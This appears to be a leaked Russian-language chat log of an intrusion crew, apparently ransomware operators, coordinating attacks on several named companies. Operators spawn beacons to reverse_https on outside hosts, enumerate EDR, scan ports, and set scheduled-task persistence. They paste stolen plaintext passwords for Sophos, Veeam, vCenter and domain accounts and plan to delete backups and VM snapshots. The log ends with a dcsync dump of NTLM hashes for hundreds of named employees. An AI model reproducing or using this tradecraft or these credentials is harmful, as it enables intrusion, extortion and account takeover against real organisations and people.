``спасибо, естьдругое дело`midwestsign.com 192.168.11.166 jkielsa CTXA715-04`[ ](https://mediaeveryone.com/channel/general?msg=LmhG5G4tPR6HmBu8L) есть такой`CTXA715-04`мне надо внешний домен + тип прав (система, юзер), хостнейм`Mitel autoupdate#82604 ` закреп естьну затупили конечнода, я давал несколько билдов и правило не отменялось + вам дали доступ делать их Н количествону ты и давал несколько билдов, просто не сопоставили + поторопилисья ведь сколько раз говорил: 1 билд 1 запускв любом случае переделываем быстреетехнические детали зачем? вам сказали делать так, надо было спрашивать сразу...если ИД тогда понятно.... не зналя бы вам мог выдать 1 длл на домены всем и не заморачиваться с тулспанельюв этом смысл генерациикаждый билд уникален в него прошивается свой IDа вчем причина? они все равно на одни и те же домены стучатся?я еще спрашивал вас помните ли вы как это делаетсяя в ахуедлл и штаскуи все старые удалитьтам не один билд надо а как минимум 4сейчас новый билд и закреп сделаю[ ](https://mediaeveryone.com/channel/general?msg=rxocXEpBqPrxag3c2) я все еще жду ответя вижу в тулспанели что последний билд собран 1.5 часа назадвы забыли что на 1 закреп 1 билд?я задам очень простой вопрос+давы крепили одним и тем же билдом...?подскажитеменя минут 5 назад выкинулокак давно крепили?открывался бы он ещё, сразу коба гаситсяпри взаимодействиикобу дропаетеще нетэтот не крепили?cedarfinancial.local1 = Skype autoupdate#35434 1/20/2021 5:38:26 PM Ready``
192,168,0,2 Hgutierreze SFE18491 CORP.TELEVISA.COM.MX
McAfee autoupdate#45234 20/01/2021 04:34:49 p. En ejecución
```+вы собираете на оба домена да?corp.televisa.com.mx 10.170.4.168 pjfrancocru SFE16537[ ](https://mediaeveryone.com/channel/general?msg=YjxfWdJLDuKfhcQEJ) 2[ ](https://mediaeveryone.com/channel/general?msg=nJ8rdQuMvHZMhNpY6) 1пока да. про мимо это про какие?[ ](https://mediaeveryone.com/channel/general?msg=TfnbXH6dmoi4kytp6) ?`CTXA715-04` так и не прилетела ?у всех длл на месте и штаска тоже?пока оба мимо`midwestsign.com 192.168.11.166 jkielsa CTXA715-04`как у @user7коба повисла с этой сессиейc u9в соло крепишь?nk.spirit.com 10.0.0.20 occdr occremote191еще закрепы есть?которые были до этогозакрепленные тоже отмечайте плизв процессе, небольшой перекус былчто нибудь закреплено?соотв там где не встал закреп -окгде закреплено пишите + самым первым символов в Noteглавное закрепитеможнов какой кобе крепить есть разница? во входной можно?у вас доступ к билдеру естьраньше я делал)ясно, просто так раньше не делаливы же не собираетесь работать только с 4 сетями?там не 1 к 1 если чтовсея не вдуплил, нам все сети закрепить или только свои?всего 2 сетичто то еще закрепилось?допишите коменты во входной кобеправил выше сообщениев общей кобе делайте маркировки что закрепленоя там ад снимаю ты делаешь спавн@user8 смотри активность сессиивам надо как можно большей сетей закрепитьлибо дальшелибо делай права``
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] tmevtmgr.sys Found
[+] TMUMH.sys Found
[+] 2 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[Trend Micro Inc Found!
``````
====== AntiVirus ======

  Engine: Trend Micro Apex One Antivirus
  ProductEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
  ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\NTRmv.exe

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

  Engine: Trend Micro Apex One Antivirus
  ProductEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
  ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\TmListen.exe
``что за ав?ни делкой, ни листенерому меня в benihana.com удалилась делка для закрепа и в мою кобу она не летит чотаsccy.comа какой домен?долго но прилетелане еще что ли?скорее всегооно?`Adobe SvcRestartTask#20900 1/20/2021 4:10:24 PM Ready `такая конструкция в имениautoupdate#а как задача называется?штаск?дадлл на месте?ну да, новый сделал и закрепилты тем же билдом крепил?[ ](https://mediaeveryone.com/channel/general?msg=kMNDp3SkYZuKMzv6f) пока не вижу10.0.0.59 system* sccy-05[ ](https://mediaeveryone.com/channel/general?msg=GeQz5F9CRCzqu5fkx) у меня этот домен, помеченав другой сессии взято и не подписано``
Teemo beacon> spawn u7
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (rawint.com:443)
[+] host called home, sent: 840 bytes
``мы теряем работувзята не взята в душе не знаюно пустая``
Teemo beacon> spawn u7
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (rawint.com:443)
[+] host called home, sent: 840 bytes
Teemo beacon> spawn https
[*] Tasked beacon to spawn (x64) windows/beacon_https/reverse_https (ownjar.com:443)
[+] host called home, sent: 261643 bytes
```ребят я вас очень прошу маркировать взятые сессиив работе и закреплена?main.crispregional.orgя открылспасибосоздалнет, конфы нет)если есть конфа то можно добавитьзакреп окконфа?закреп - ококтакой есть т е прилетелну хз, на нём пометки не было я и взялтакой есть``
192.168.0.2 SYSTEM* SFE18491
CORP.TELEVISA.COM.MX
```
`CORP.TELEVISA.COM.MX\Hgutierreze R8WTksIOle1rP8)P`и можно группу создать с этим доеном плзщас домен``
10.1.111.100 jgemperline BEN1064-MGR-10
benihana.com
```и еще внешние домены пишите пожалуйста[ ](https://mediaeveryone.com/channel/general?msg=Ct9XShzSPimmfyrK5) +а, все. вижупроверь файл и штаск173.234.155.15 192.168.75.175 https SYSTEM * CRRHORC19нету такого...система имя компаили доменмне надо хостнеймэто юзер?закреп
SYSTEM * CRRHORC19окей. тогда тебя не дергаем[ ](https://mediaeveryone.com/channel/general?msg=3BXgDHmQC8hAECd5s) Пока да, нужно лабо подготовить к завтрешнему дню, но я рядом)у всех ок с билдами?вдруг где будет сразу домен админоперативно соберите хеши на брут для @tl2и сделайте как у @user9щас всем перевключу модуль[ ](https://mediaeveryone.com/channel/general?msg=fypApjmJxLdv9EZf6) да, получилось@user3 ты пока не с нами от слова совсем верно?настраиваю лабыпоробуй еще разок обновить стр и сбилдитьBenjaminCallsскину сюда несколько билдов(```
{
    "domains": [
        { "kalarada.com",
        "tuxomibo.com"
    ],
    { "bit": "x64",
    "period": 15,
    "lasthope": 65
}
```не помоглорелогин пробовали?дайте параметры из show?такая же хреньновые не скачатьни одной помеченой сессиигде @user3 @user7?крепим оперативно или вам тупо будет не с чем работатьи доменыв тулпанели обновили билдраскидайте сейчас закрепы на входные точкипометиля не пометил, во входной живаяникто не пометил свои сессии? 2 человека и у одного мертвая сессияу тебя окнет, всемне крепимты мне?отменатолько 1так ну что?+даlfот юзера запуск?10.0.67 dough SCCY-LT04если дропает то работаем дальшескинь длл плизмакафи
```
 4836 924 naPrdMgr.exe
``тогда какой ав?elfkbkfcmдаона же должна лежать в папке после запуска?среди тасков не вижу2 мин2 vby``
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 1/21/2021 1:00:00 PM Ready
AdobeGCInvoker-1.0 1/21/2021 8:06:00 AM Ready
G2MUpdateTask-S-1-5-21-1989139100-303601 1/20/2021 2:38:00 PM Ready
G2MUploadTask-S-1-5-21-1989139100-303601 1/20/2021 3:47:00 PM Ready
OneDrive Standalone Update Task-S-1-5-21 1/21/2021 11:04:46 AM Ready
```[ ](https://mediaeveryone.com/channel/general?msg=MnXjJmjcc5SNGbCHi) есть?уже прочитал выше))без ДА[ ](https://mediaeveryone.com/channel/general?msg=g6oErPtYMLQZGn8bp) еще да нетусессия 173.234.155.15 192.168.37.115 https amypriest CRRHHCC4дав штаск же пишется?[ ](https://mediaeveryone.com/channel/general?msg=wPganWRj5HC2WAB5q) а это где?ток сессия отвалиласькрепилДа@all кто-нибудь тут?еще не крепили?не забывайте хеши кидать @tl2сделалможно конфу CRISPREGIONAL.ORGпишите сессию где уронилиуже можно[ ](https://mediaeveryone.com/channel/general?msg=9AnAuKnpThCWdiR9Y) ну как можно будет крепить, скажина входные точки уроните да[ ](https://mediaeveryone.com/channel/general?msg=2ySXTddqwbmCmuARP) после ДА закреп или сразу?проговорите на всякий случай пожалуйста+правила запуска помните?которые уже там естьюзаем 2 доменат к может быть так что неск сессий из одной сетивсегда проверяйте доменщас мб домены сменятсяпока не запускайте)перед запуском скажите где запускаетепоэтому по классике крепим входные точкизапускать уметесобираете себе длли последнее просто 65интервал от 15 до 20просто чекайте оба доменавопросы как пользоваться есть?+увидели новый тул?сделалконфу плзsccy.comоткрываю вам новый раздел в тулзахща поглядимпрям очень хорошему сразу поднятие до ДА и закрепда)разбираем?один есть)пустая..входая коба``
192.169.6.82
https://ownjar.com
----------------------------------------------------------------------------------------
185.150.190.153:49698
9AR3B4a2bORZSN28ST8wLqbH0F0Wvo5buE2
```пока отвлекитесьмежду собой координируйтесь и в конфу уточняющие вопросы и логи по работепоробуеможет закроем сегоднядавайте тогда все работаем над балиморуже пятьна местеа где @user9?@user3 off былпока 4а сколько вас?балимор буду раскручивать, искать насы бэкапы и прочеекакие?)дапривету всех задачи есть?Всем привет``
URL : https://id.sophos.com/
Username : ithelp@teng.com
Password : expFedAdm1n$

``[ ](https://mediaeveryone.com/group/expfederal-com?msg=5ptz5FSD23puGa8zk) еще один сторейдж, креды те же
```
https://10.20.4.52/ui/#/host/storage/datastores
```[ ](https://mediaeveryone.com/group/expfederal-com?msg=xuQ42XB7ok3LqQZp6)` portscan 10.20.4.56``HOBBES\SAVDBAdm exp.FederalSAV`посмотреть что на серваке - рут то есть вонудалить снапшоты да залочить вритуалки сами внутри которыечто "как быть"?@tl2 как быть?и вроде как не в адэто никсовый серввот там 43 тб вижу дисксетевые диски и прочеечекайте снапшоты виртуалокНашел такой `beremote.exe` бекап Symantecвот этой штуки нет в ад комп
```
--- Chromium Credential (User: RamirezJ) ---
URL : https://uschi-vhp001.hobbes.loc/ui/
Username : root
Password : VXRail-2018

```этот недоступен?5480[ ](https://mediaeveryone.com/group/expfederal-com?msg=2XfcWXmLos5yfgNqm) а какой пул сканил?не канает[ ](https://mediaeveryone.com/group/expfederal-com?msg=vBgkQCXAf4mHaxmb7) зайди через ип на фул урлага доступен``
10.20.4.56:636
10.20.4.56:514
10.20.4.56:443
10.20.4.56:389
10.20.4.56:88
10.20.4.56:80
10.20.4.56:22 (SSH-2.0-OpenSSH_7.4)
```по ип поробую443 открыт?агавообще резолвится?с тачки его кинули зайдите по ипкиньте с его тачки тогда))а вы сокс кинули...?[ ](https://mediaeveryone.com/group/expfederal-com?msg=N4pwzS2x547npWLnj) точнее не креды, а вообще не заходит по ссылкебольше доступов нет?угу никсовый``
>operatingSystemServicePack: Likewise Open unknown.unknown

``[ ](https://mediaeveryone.com/group/expfederal-com?msg=yvriitbtxRt3kXxTo) никсовый, креды не подходятну же везде хорошо быть должно
иначе как бы мы работали = )почти всеага, и все машины с одинаковым ла ;)приятно видетьв кои то веки корректно настроенысервисные акки``
HOBBES\SVC-SpPCHIDBG001 D66pHukJG5W7RwZD8PXi
HOBBES\SpSvcApps_pchiwsg001 QGVS3bbeW03Rp7UUYIoD
```
какие у них интересные креды)```
--- Chromium Credential (User: RamirezJ) ---
URL : https://uschi-psc001.hobbes.loc/websso/SAML2/SSO/vsphere.local
Username : Hobbes\RamirezJ
Password : Reva:thedog2017

``сработало, спасибо``
URL : https://login.veeam.com/
Username : javier.ramirez@expFederal.com
Password : VM4l4d33n0r4l4d33n

```бинд пайп попробуй`USCHI-BKP110` похоже на veam``
>description: Hyper-V server
USCHI-VHH010.Hobbes.loc
``````
HOBBES\RAMIREZJ Reva:thedog2017
HOBBES\SLADMIN SLTadmin2003
HOBBES\SLUSER SLTadmin2003
`57/146 живых`hobbes\svc-nwa001 KeysOfTheKingdom!`10.20.32.20vCenter 5.1 Server 2013 - PCHIAPG008.Hobbes.loc
vCenter 6.x -USCHI-VCH001.Hobbes.locну может и в админку вцентре пустить вполне под доменынми кредами ДА какого-нибудьпроверь фс и диски?```
вцентр вроде на винде
```
надо убедиться что снапшоты храняться там же на серверевинв общем пингуем, сортируем и прочееа ты глянь ОСбэкап сервера тоже помечены в адкомп, тоже виндовые)
```
>description: vCenter 5.1 Server 2013
>description: vCenter 6.x
```вцентр вроде на винде``
>operatingSystem: Windows Server 2008 R2 Standard
``+++++все тут?user9user4по технарям пройдитесь
поищите инфу по бекапам
убедитесь что есть доступ в вцентр (или что он на винде и прилочится нормально)
посмотрите виам куда бекапит
и можно прибиватьОкнах оно нужно палить попусту бекдоры там ?то и не крепитеесли сегодня закрываемдавайтеСегодня?дл щас выдамSOPHOSсорт серверов и т ди можете ее готовить к закрытиюскажите сразу АВзяли два серваканашли?кидай делки @tl1``
Teemo[PCHIDCG003]SYSTEM */4764|2020Dec11 00:33:52> dcsync Hobbes.loc
[Tasked beacon to run mimikatz's @lsadump::dcsync /domain:Hobbes.loc /all /csv command
[+] host called home, sent: 438858 bytes
[+] received output:
[DC] 'Hobbes.loc' will be the domain
[DC] 'PCHIDCG003.Hobbes.loc' will be the DC server
[DC] Exporting domain 'Hobbes.loc'
7351 TENG-ACCT$ 6d3a02a1dbfcc07957d1df41d5444768 2080
3781 SQLAgentCmdExec b3a7b463713310b416251471777fa0d3 66048
15301 SP_SSRS 076408f8e718dad08ad94a5e5019f762 66048
13103 SP_SRV 68a80609b1306f1e3add3f5b0c9ff181 66048
15642 SQLTESTDBUSER 2226330629e28473c4d290b17dcab0d0 524802
19340 SVC-Openfire-Admin a3f0910d49ba088a45d243438bcc48a2 66048
13964 IWAM_FS-0027 9a2f40bbb9ff1e39133e61b289a175ea 66048
19501 SVC-DCHIAPG001 cb26b90b52d067d83acfc65c2a3b4c0f 66048
4425 WS-0005 5281901e3711eaed959498ec917c2899 66050
19566 NLB-WEB01 b61901c0ca1611bb197131cd56943faf 66048
18841 RIVERBED 85ad7a16dda051d635ac3821b15a8271 16843264
13424 SP_Guest e6d9170e90f4a7e6f21280ed3c0517d1 66048
20202 SVC-RENDERFARM f62c5ee137914dd9ee56e91190121002 66048
17077 SP_FARM2 8cad7030797f2f44f72788f7f8a6b1f4 66048
13505 SP_GuestACS f2d438a9fe97ee2eaad900e0dd2c63b1 66048
15469 SQL-RPTSCHPHN a9bed826519203d82a8ae1c1432b1486 66048
18828 sh-0003$ cd40fb78af6248e3544a4af7478e0d 4096
20253 SVC-SPBACKUP c311b011bfc2f32edab6c95c0caf6fa3 66048
19564 SVC-DCHIAPG001-APP01 da15412388a03c8ac31dfcce8afd09b8 66048
20279 PCHIWSG009$ e52deef2201a59ed99dc0db24eb4b82f 4096
20733 PCHIWSG008$ 18daa9eebc41709766da594298307a07 4096
13502 SQL-vCenterAdmin a1940aad3133f4f21d61c22435b9fb65 66048
17002 SP_FARM 8cad7030797f2f44f72788f7f8a6b1f4 66048
12460 DCDHCP 68a80609b1306f1e3add3f5b0c9ff181 66048
16747 SSRSTengRpt 8c1542d97d9b79b48c06e1c07b07a232 66048
7721 EQLOANER 53f7c8703df697d350750a011e2fe088 66048
6310 SECMON 6b23cfaefade6334400928e42b6e2b5c 66048
16807 SQL-IRoARpt ee5ffe7df654e6904ab88711d8d94c78 66048
4316 Tririga Admin f3229ad17598f5bcd0b272d7670d8eb5 66050
20794 SVC-SQL0005ToDMZSQL d77025566bfab9149fd7b2124675677f 66048
20281 SQL-DeltekToTengRO 5cec88ff3d9b6fb93510849984b6f452 514
3076 DILBERTXX 54229da8f8d221fc1aeb94f04d61ecc1 66048
19237 SVC-DCHIDBG001 8512ff5982fcd48d9ea4e717e225cd91 66048
21794 SPTestUser 6364271e1a2232e42ecb3406eeb8f823 512
19529 PCHIAPG004 3c7ea1911b9f90f57889716ef346e1c3 512
18080 WS-0007 68a80609b1306f1e3add3f5b0c9ff181 514
18748 VSSQL0003 90655ec9fe04e0b27291e5da2c0013b7 514
17857 VSSQL0002 7059bd4edfb8547c89108945313e7be4 514
19530 PCHIWSG003 7be11b959ab976ca7472f96d1b2560fb 514
19522 PCHIWSG002 6dfd7e3370334bd0744c9accd5c1061a 514
19521 PCHIWSG001 ad63cfb46defee50ed6b3dbb3b394ac1 514
21234 PCHIDCG002 21795387c0638972a387d8780383fa0d 514
19516 PCHIAPG003 69e793f4f0cdfb4cfe22a4f8ecdde1b2 514
19523 PCHIAPG002 559b2d5277ca59a70c1a839e6224ab59 514
12699 SP_IIS_APP01 076408f8e718dad08ad94a5e5019f762 514
12700 SP_IIS_APP_USACE 076408f8e718dad08ad94a5e5019f762 514
17193 sp_ACSgc 09f18ad0dfb95eece617c5cb6a6578ce 514
13116 ftbenningg1 e5ccb8571d2ff5323cc5012439b4e7 514
13504 _SP-ACS 076408f8e718dad08ad94a5e5019f762 66050
19707 sp_pmacs fb3f42647b2dc1d1fc3650cfbbcf9ed4 66050
13514 _SP_IRoA 076408f8e718dad08ad94a5e5019f762 66050
19708 sp_imacs fb3f42647b2dc1d1fc3650cfbbcf9ed4 66050
13576 sp_clientacs f2d438a9fe97ee2eaad900e0dd2c63b1 514
13123 _SP FtBenning 076408f8e718dad08ad94a5e5019f762 66050
13105 SP_SEARCH_SRV 076408f8e718dad08ad94a5e5019f762 66048
13400 sa-sharepointdba 076408f8e718dad08ad94a5e5019f762 66048
21245 SVC-CDR-CallLogDrop 65848727f354af155f640c7b978ccc6f 66048
15524 SQL-AppAuction a8641e863021a0097288225e2c3225ae 66048
19914 SVC-IROA-SP-IROA2DB ba8b91f6c6b4a57196b5f98dec0239b6 66048
18902 DCHIAPG001 eb8162e99613ee77d748ebef863beb97 66050
18903 PCHIAPG001 b1cd050101dc230f5c379b6a1edbe00f 66048
19742 SVC-ZENOSS 6e9d7f9b4eabc311d8fe548ccaf3827b 66048
20063 PCHIAPG002$ acf70e009b52f487059320b52dd8c415 4096
7353 CMICSUPPORT 24e07a99097e95374e2ba0fae7716c15 514
1975 EXCRES e28c2ffc7b411f62a01089a7d746c088 514
21785 LT-900223 bf89f60275e8e1e1b6ef9750d04da952 66048
34794 exmerge 757d1c465d04ef58ba57fd699f92b97c 512
22079 Terry.Thompson e491d1b24f392f21ce9a38070555bc3d 66050
33887 SP2013content 7b2784302223746c3ab288de4f44fb82 66048
33890 SP2013superreader ef18fad8d8c04de6b98191c55c228f87 66048
33883 SP2013install 505e41852a2bc9a2cf8dfeccee93ed08 66048
33891 SP2013sqlinstall d20c68065f87178df8f204838dcc3ad4 66048
34822 SCOMreader d44a4e4513964adca599356bed8a663e 66048
34825 SCOMwriter 12951f364679fe127dcca1369ea37101 66048
34812 SCOMdb 8e6d2e3f01be9ab7c510fb6960a734e5 66048
34835 pfink 9dc4be7322f4e85d97f8cd6d0a5e898d 66050
21233 krbtgt_29044 3f84d34fdca0041f3892f60692b2ebc9 514
15274 FS-0056 67dbfb53036906e36170593182eb7990 66048
13944 FW-0015 2c50e78ba2f50b0b8a83cd9b0757fb71 66048
13013 DEXTERRA ccc6930692ded0b8694ca5438d71081e 514
34734 splunk-test 174009eab65310987c9f0a53e0d2baca 514
37324 Jeff.Roemer 6131349933cb5fc2f2d65ee3bd57d295 514
37325 Zach.Gardner 5988814a367010a477b94e0f07b1e0f3 514
37326 Mark.Dvorak aecc10cfeb546d6fcebf6171e1ed99ba 514
37351 Steve.Dalo 37ac503d0e481716d218c2a6e74cce1b 514
36513 Bob.Jeffers 8ec39ee848b3dba7c1c0cc9fb650f906 514
36227 Raymond.Lowman 6e564b6f12b7feda82b04582fe65842f 514
37668 Duanne.Mclaine e82d29c0dfb2ad3d18dce800cd4cf390 514
22090 Loblaws 93b0ef17748fc3f0c228a298ce520e31 66050
20227 PCHIAPG008$ 488f797b3dcead9be0a6121b63ca6c0a 4096
33755 John.Williams a863beff0611411e77a091f169f2163f 514
22062 Mauro.Crestani 8c0219b11dcc34266444df1aa4c78d64 514
34332 Kathy.Ng 2aa01ad1babd992e685a997645e46e9f 514
37332 Todd.Hill 1ffbcdafa9d05573fdd2e0854633172a 514
34330 Chad.Groshart 2aa01ad1babd992e685a997645e46e9f 514
34331 Lee.Simon 2aa01ad1babd992e685a997645e46e9f 514
35872 Catherine.Leskowat d048edb521fd72258ede9f4bbbcb58d2 514
36525 Randy.Baccadutre fd111572adcc65e3d7bd4f284386b473 514
35817 Brad.Daniel 7e239559ff9da84f62f429c35943f46a 514
34333 Peter.Ellis 07759524c6fe35b1fb9227afd35a2bbd 514
36205 Christina.McAlhaney d90e2ee11481a93453c8bdf53b667f8f 514
36522 Grace.Spear d84339a30ab9777b2a9b8265bc11b5ef 514
36511 Greg.Wys d84339a30ab9777b2a9b8265bc11b5ef 514
36510 Dennis.McNeil d84339a30ab9777b2a9b8265bc11b5ef 514
36509 Brian.Donnelly d84339a30ab9777b2a9b8265bc11b5ef 514
36512 Peter.Schreiber d84339a30ab9777b2a9b8265bc11b5ef 514
36209 Philip.Kerrigan 22b54f16e554f9cc50fca8990a621af2 514
34336 Ken.Neuhauser ea30d8683ffe121232568a7990c16066 514
34335 Chris.Schumacher 7324dee82144e76bcb64107fbfecffa7 514
34334 Alex.Lukachko 2aa01ad1babd992e685a997645e46e9f 514
22010 Christine.Brazill dcf1598abf0d61b14aa2c24a39e4f42a 514
21856 Daniel.Goodman cffcadaf230a1ba1697233f4ed8a9a37 66050
22013 DJ.Bailey dcf1598abf0d61b14aa2c24a39e4f42a 514
33769 Melinda.Fitter a1f97b707ceeb397aa667655180fdaee 514
22080 Richard.Eber 08844bb002c6fe66315e6e93efbb07 66050
37362 Bryan.Johnson 760712966d90ecf2ad3e341b354442b5 514
37363 Debra.Cohen 23997056a7dddf659383c3c769dbe579 514
37361 Jason.Popovic 55139ce93d8fc92fa3b0c1d33d530fa2 514
37364 Lauren.Martin 1429bbfdb4c18e80281ac488b8067b4e 514
36968 Bob.Beringer 88f525992fb5f7cc19c57a2fa86591e8 514
36969 Will.Pullen d27a63d44b2d08d1e64ef9c8ff0d0c07 514
36977 Tony.Puckett 85331a04a1942ecfbe71f4e65457f462 514
37244 Woodrow.Simms db2d316409094252cbab1030f1085a90 514
22124 Kathy.Weise 6364271e1a2232e42ecb3406eeb8f823 514
36228 Melody.Thomas b60e068b7a0cc33febb101d731dc0c97 514
21848 Ariz.Masters e774a9021f7fb9408c587688fc83d102 66050
21855 Jake.Carlile 00ae862ed0e75a057e61f0e0288907ad 66050
21957 Ryan.Reu 32ac246a362471660a42ea7ef29b5b68 514
33744 Matt.Hamrick 8ec39ee848b3dba7c1c0cc9fb650f906 514
33742 Jamie.Setter 2aa01ad1babd992e685a997645e46e9f 514
21894 Theresa.Bridges 434f2ce607a0b358588ca562ce973bd6 66050
21296 Siva.Haran fe81eca7d279885792038756911c4bf0 514
36230 Parviz.Mahdavi 990b6b0c2f6cc8e9e4e1e64bb2d9081e 514
22169 Samuel.Alexander 188d0a4fe11344f4a7de2922e85ad762 514
37202 Zach.Neill 6fd9968ade6bb14f41004f334e0d2b1d 514
37040 Dick.Westrum fca7da4aa0f7ccdf315f8d4427844edd 514
36260 Michael.Bechtel 4f31dd7b47de4a64e8630eaa90bfff70 514
22146 Shannon.Parish cbb79b2fcfebacc3e3574f770a5d693a 514
33740 CalhounG 388cf9d9b3e302582fa7283ced787c77 66050
22171 Dawn.Austin b1eacb7a902f4a284597923ca0f46bfb 514
36224 Christina.Longbrake fdb56c6d2e5c63c544c11eff76dff87a 514
22170 James.Allen d2c66eef5e131b86998db5e0c2d07d19 514
36404 Matthew.Morris 2aa01ad1babd992e685a997645e46e9f 514
36402 Robert.Rugala 2aa01ad1babd992e685a997645e46e9f 514
36633 Michelle.Coghill 889d8b42a0afa88b47ee35993c25a578 514
37177 Tony.Rhein 0f5390bc3feca271d6495027956461f8 514
36213 Erik.Caylor 2aa01ad1babd992e685a997645e46e9f 514
36638 Jason.Schaffer 8ec39ee848b3dba7c1c0cc9fb650f906 514
37042 Fang.Li 13572a57e90ebe6a1970d36f1cd0ea55 514
22778 Tom.Lohner b60e068b7a0cc33febb101d731dc0c97 514
22077 Dave.Shreve 989b8f7d98643ef14c225350b9bbe792 514
36211 Robert.Rodrigues a071fdf94847e8cd2da25ebe89ceeada 514
22109 Jordan.Ehrig e414b39ab33c981a7e1c2cdfad97a68f 514
36527 James.Mierke 2c5b3e4e5b856464019245b74023ac39 514
36210 Jess.Cathcart f10cfa6ca0574cd41156d71123e81a47 514
36463 Richard.Poirier 9194da895682192b9ba9982040f1c50f 514
36232 John.Fabian 31796c39959f8a19933ccf8cdcfb5e77 514
22110 Russell.Laquey ce5f35539b189d06c867f70e268d0492 514
33741 EddyD 282f47af71f7d5585343f7d916991509 66050
22059 Justin.Sartler 4485e8c30594aaeb6f8d9fd743f1fb88 514
22039 Anthony.Herrera 5cbbafa3aa2fa9e4e0831be74a4c42e8 514
22076 Eric.Doan ed6a2f9660991407ec5d215be6232050 514
22040 Soledad.Angeles 5cbbafa3aa2fa9e4e0831be74a4c42e8 514
36226 Stephen.Holicky 2aa01ad1babd992e685a997645e46e9f 514
36466 Terry.Malloy 8ec39ee848b3dba7c1c0cc9fb650f906 514
36403 Terrence.Malloy 2aa01ad1babd992e685a997645e46e9f 514
22168 Chris.Beckman 014a91e14bed8e3231fb6c9aad77100d 514
22160 Joseph.DiGuglielmo 59f3f9675dbbc4fd677f296664430a19 514
22167 Christopher.Zwicky 2aa01ad1babd992e685a997645e46e9f 514
21958 Nicolae.Dumitru 7f4ca153e5ebb021f180d76395f0e8ba 514
36629 Terry.Lackey 8ec39ee848b3dba7c1c0cc9fb650f906 514
36609 Jarrod.Cafaro faf1ffe186f89d6f211a831fbc9f642c 514
37350 Lauren.Young f30438fac4dd0556896448b6ef2babc7 514
36630 Andrew.Robertson f62b2e3f42926e2e2a5cd9cc40ba1c83 514
33751 Keith.Mueller d77cf4d5c3115e01e89f24cd8fa0f8d5 514
37450 Kyle.Williams 7c0413d4334c73bc404e88c8d1c676e4 514
21851 Julia.Maschek 20016d2585577b8144dcd8487a9ffc9c 514
36212 Anthony.Oplawski 312b75bf538ee3cf8cbc7453ae7a3f76 514
21974 Terry.McDonnell f3461c36556bf320e57b3cbc50e3f4b3 514
21898 Stephanie.Coad 6fd117a11f0fae1e0f14c5edf2c4e16d 514
36636 James.Grice 8ec39ee848b3dba7c1c0cc9fb650f906 514
36635 Jonathan.Pearson 8ec39ee848b3dba7c1c0cc9fb650f906 514
37365 Zack.Gordon f1b996d44a60a2aa7b18008ae64df6e9 514
37366 Kinan.Hayani c8ffcead279dd48bd3f5e2f6ff0dfb3d 514
37367 Michael.Nettesheim 14101484112ba3322b5fadd92b494ad2 514
36971 Brian.Poyant f7a5ece47465203cae2a5c7a3363a582 514
37141 Carl.Mankinen e4fa8721cd627408ab561ee7bdc3a8c8 514
36970 Rick.Nohmer fdc91a227a032e37717a8b2c2bfc91e6 514
36998 Kip.Paxton 7ce1e7f38bfb6582356623bcf135f5a9 514
36999 Jill.Poyant 816aba31601cba700b237e72f50f2883 514
36669 Randy.Webb 6a7cfdd4f82f2c84b862903bf63ee763 514
36670 Mike.Herrin f31c0b7c10b8e674378aba53a3a75710 514
36716 John.Yenges cc6d2624d64073e80446c1837e761074 514
22125 Darrell.Oyer fdadcf2f1a529285c5d445f6096bfab9 514
36610 Greg.Baughman 690b638dafc62a2d4f796b2f4d19fd35 514
36972 Reza.Alipanah 3f6ae10e05963bd2c19129f23da87b00 514
36973 Joseph.Alipanah faafb7501c67fe8097c07ac26e556a38 514
36975 Tommy.Gardner 9c42cb6942e1576b9a6dede8580542cc 514
36976 Joe.Wysocki 9c42cb6942e1576b9a6dede8580542cc 514
22176 Bill.Higginson a8d079ee5132707532738accdc15c8f7 514
22175 Glenn.Wilson 2aa01ad1babd992e685a997645e46e9f 514
22179 Zach.Peterson 2aa01ad1babd992e685a997645e46e9f 514
22178 Ashley.Peterson a74f35eb13031e426bb171271b0b4af6 514
22177 David.Affleck f8b29a627c7dcf5ad652a9c5a9ff0fb6 514
22174 Steve.Thomas 2aa01ad1babd992e685a997645e46e9f 514
36529 Cameron.Baillie 56cd5f116dc7f4712a3de43902b1aa2f 514
36530 David.Paoli 56cd5f116dc7f4712a3de43902b1aa2f 514
35867 Rob.Downs 2aa01ad1babd992e685a997645e46e9f 514
36668 Steven.Below 6a7cfdd4f82f2c84b862903bf63ee763 514
36555 Susan.Martin e50022b17de0adcf659a3f322b1e85b8 514
36974 Mike.Beaver e47c5a89bebda342c81d45a9db85f51a 514
37359 Jason.Greenlaw 20e4633610456c807a78fc035487aa30 514
37360 Jill.Trundy f3cbf374df77527ef2e2a7545cc9de34 514
37356 Gregory.Hobbs 4c5e3b88f6370fd813fe14b0af71ea29 514
37358 Martin.Dodd 4e2bd4d1fd28bfaae676c4d79ef2ed32 514
37357 James.Stephenson a6952118b704b00afb9d8a0a7d102b62 514
36257 Eduardo.Obregon 8ec39ee848b3dba7c1c0cc9fb650f906 514
36255 Luis.Perez 2aa01ad1babd992e685a997645e46e9f 514
36258 Irbis.Gallegos 2aa01ad1babd992e685a997645e46e9f 514
37200 Mark.Watson e20b88eed2e169903256bb0421a0ec53 514
39294 SVC-SQL-TaskForcePow 9fb46b91e1ab932d1af23a88cb2ddc91 66048
37738 SophosSAUUSCHI-NET00 d57d4348693351112be0fa9278a4d89b 66048
38593 James.OReilly eb157dd24543080aa80f43eeb3120cfc 514
20234 QMMAD 7a0dc3b652f0bdf99c4b17616a81afca 66050
3190 WS-0002 68f01048eb4a48be9bfaf5907fba8b58 66050
34726 SH-0004 e841e88e29270c01ad6259a01fda98eb 66048
40235 HealthMailbox70e1a8b 922cf34124f2d39d14688a8dfe304e9b 66048
33990 HealthMailboxd742523 37826e702cdfa20af5b34a7bce795959 66048
33991 HealthMailbox40b9f47 f0b4b926cf7f77afeda9f73a9a7d3353 66048
39337 HealthMailbox6203626 20fb5125483e5ea0c0ac15206fed8be9 66048
